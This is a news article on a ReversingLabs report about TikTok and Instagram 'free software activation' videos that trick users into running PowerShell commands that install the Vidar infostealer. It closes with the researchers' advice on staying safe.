07.03.2024
1 min
1165
A new study warns that cybercriminals are using viral “hacking” tutorials on TikTok and Instagram to trick users into downloading malware capable of stealing passwords, personal information, and even cryptocurrency wallet data.
According to a new report from ReversingLabs, cybercriminals are luring users with short videos that promise free software activation and premium upgrades for popular services and applications, including Spotify Premium, Windows, Microsoft Office products such as Word, and Adobe Premiere.
“These campaigns, primarily conducted through TikTok and Instagram Reels, use the same template to mass-produce videos and publish content on a regular basis,” said Zaria Vuksan, a threat intelligence researcher at ReversingLabs.
Researchers say they uncovered two separate phishing campaigns that relied on short “hacking tutorial” videos distributed across multiple social media platforms. In both cases, users were directed to secondary websites that allegedly offered free software downloads.
“Both approaches serve different objectives, and the differences show how threat actors can leverage various aspects of social media engagement to reach a larger number of potential victims,” Vuksan said.
The first tactic is relatively straightforward. Threat actors create polished videos featuring professional voiceovers, clean graphics, and convincing instructions, then repeatedly post them across platforms using multiple accounts.
In the Microsoft-themed scam, researchers found that fraudulent accounts used official Windows logos and profile names such as “windows.tips” and “window.insight” to appear trustworthy and legitimate.
Many of the accounts and videos also included carefully crafted descriptions and keyword hashtags to make them appear like legitimate customer support pages.
One of the fraudulent videos identified by ReversingLabs attracted more than 100,000 views and thousands of interactions, making it more valuable to recommendation algorithms and increasing the likelihood that it would appear in users’ feeds.
Once users engage with the content, they are instructed to copy and paste a specific command into Windows PowerShell, which is falsely presented as a way to unlock premium features or activate software for free.
“The video is short and concise, walking users step by step through how to access PowerShell from the Windows menu and what command to enter to supposedly unlock the free service,” the blog states.
Vuksan noted that non-technical users often do not fully understand command-line instructions and may assume they are legitimate.
“Threat actors rely on that misunderstanding,” she added.
Once executed, the PowerShell command delivers the next stage of the attack, downloading the powerful Vidar infostealer directly onto the victim’s device.
The second phishing tactic relies on engagement bait, often showing someone demonstrating premium software features that they claim to have unlocked for free.
For example, the videos are typically presented as ordinary user-generated content accompanied by popular music, while falsely claiming that viewers can get Spotify Premium at no cost. These campaigns frequently span multiple videos.
The goal is to encourage curious viewers to leave comments asking how the trick works. This gives threat actors an opportunity to respond with instructions, links, or follow-up videos that ultimately direct users to malicious websites.
Vuksan says this strategy helps boost engagement and build trust with followers before directing them to carry out malicious actions.
The actual lure is introduced only after a profile begins gaining traction on TikTok or Instagram.
Researchers who attempted to report the content but were unsuccessful also noted that social media-based scams can be particularly difficult to counter.
“Users who recognize malicious intent, either through research or by encountering it themselves, may try to warn others in the comments. However, most platforms allow content creators to delete comments and block commenters,” the researchers said.
Malwarebytes, which published its own analysis of the ReversingLabs findings, warns that the Vidar Infostealer quietly steals sensitive information from infected devices, including:
Browser data — saved passwords, cookies, autofill information, and some two-factor authentication data.
System information — details about the infected device and installed software.
Login credentials — usernames and passwords for installed applications and services.
Cryptocurrency wallets — wallet data and private keys for various cryptocurrencies.
First identified in 2018, Vidar is designed to harvest information from compromised systems and send it back to servers controlled by attackers.
Malwarebytes advises users to never execute PowerShell or terminal commands obtained from untrusted sources, as these commands can be used to silently install malware and compromise a device.
Researchers also recommend treating social media “tips” with skepticism, as even seemingly legitimate accounts can be used to distribute malware. They advise users to rely on official channels, such as vendor websites and authorized applications, when subscribing to streaming services or downloading software.
Finally, they urge users to keep real-time antivirus protection up to date at all times, as modern security software can help detect and block malware and information-stealing threats before they are executed.
